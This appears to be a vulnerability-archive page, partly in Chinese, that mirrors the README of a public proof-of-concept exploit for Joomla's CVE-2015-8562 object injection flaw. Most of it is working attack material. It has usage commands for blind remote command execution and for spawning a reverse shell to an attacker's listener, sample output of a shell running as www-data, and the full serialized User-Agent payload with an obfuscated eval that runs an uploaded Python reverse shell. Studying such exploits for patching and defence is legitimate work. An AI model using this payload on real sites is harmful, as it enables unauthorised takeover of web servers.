关联漏洞
标题:
Joomla! Core 远程代码执行漏洞
(CVE-2015-8562)
描述:Joomla!是美国Open Source Matters团队的一套使用PHP和MySQL开发的开源、跨平台的内容管理系统(CMS)。 Joomla!中存在安全漏洞。远程攻击者可借助HTTP User-Agent头利用该漏洞实施PHP对象注入攻击,执行任意PHP代码。以下版本受到影响:Joomla! 1.5.x版本,2.x版本,3.4.6之前3.x版本。(在2015年12月广泛利用)
描述
A proof of concept for Joomla's CVE-2015-8562 vulnerability (Object Injection RCE)
介绍
# Joomla_CVE-2015-8562
A proof of concept for Joomla's CVE-2015-8562 vulnerability (Object Injection RCE)
## Intro/Changelog
This PoC is the second version of the implementation hosted at [exploit-db](https://www.exploit-db.com/exploits/39033/).
-Fixed (regenerate session)
-Added the option to switch from X-Forwarded-For to User-Agent method
-Added the option to switch from a python reverse shell to a bash one
-Added catching exception for missing http schema and script termination
-Edited for a better usage, better messages and colors
-TODO: adding msf support
## How to Use
git clone https://github.com/VoidSec/Joomla_CVE-2015-8562.git
cd Joomla_CVE-2015-8562
Blind RCE:
python joomla-cve-2015-8562.py -t http://<target_ip>/ --cmd
$ touch /tmp/test
Spawn Reverse Shell:
python joomla-cve-2015-8562.py -t http://<target_ip>/ -l <local_ip> -p <local_port>
[-] Attempting to exploit Joomla RCE (CVE-2015-8562) on: http://<target_ip>/
[-] Uploading python reverse shell
<Response [200]>
[+] Spawning reverse shell....
<Response [200]>
Listening on [0.0.0.0] (family 0, port 1337)
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
### CVE-2015-8562
In December 2015 a new vulnerability was found in Joomla. It allows a remote attacker to exploit PHP object injection attacks and execute arbitrary PHP code via the HTTP User-Agent header.
This vulnerability target Joomla 1.5.0 through 3.4.5 and PHP version before 5.4.45 (including 5.3.x), 5.5.29 or 5.6.13 [CVE-2015-6835](https://bugs.php.net/bug.php?id=70219).
I've made this [blog post](https://voidsec.com/analysis-of-the-joomla-rce-cve-2015-8562/) explaining the vulnerability.
#### This is what the sent header looks like
```
}__test|O:21:"JDatabaseDriverMysqli":3:{
s:2:"fc";
O:17:"JSimplepieFactory":0:{}
s:21:"\0\0\0disconnectHandlers";
a:1:{
i:0;
a:2:{
i:0;
O:9:"SimplePie":5:{
s:8:"sanitize";
O:20:"JDatabaseDriverMysql":0:{}
s:8:"feed_url";
s:305:"eval(chr(115).chr(121).chr(115).chr(116).chr(101).chr(109).chr(40).chr(39).chr(112).chr(121).chr(116).chr(104).chr(111).chr(110).chr(32).chr(47).chr(116).chr(109).chr(112).chr(47).chr(76).chr(56).chr(51).chr(55).chr(66).chr(72).chr(46).chr(112).chr(121).chr(39).chr(41).chr(59));
JFactory::getConfig();
exit";
s:19:"cache_name_function";
s:6:"assert";
s:5:"cache";
b:1;s:11:"cache_class";
O:20:"JDatabaseDriverMysql":0:{}
}
i:1;
s:4:"init";
}
}
s:13:"\0\0\0connection";
b:1;
}ýýýý
```
文件快照
[4.0K] /data/pocs/6554dce0fc47c9dbb6161d81ed4b58b44bedc30d
├── [1.4K] example_of_joomla_session
├── [6.7K] joomla-cve-2015-8562.py
└── [2.5K] README.md
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。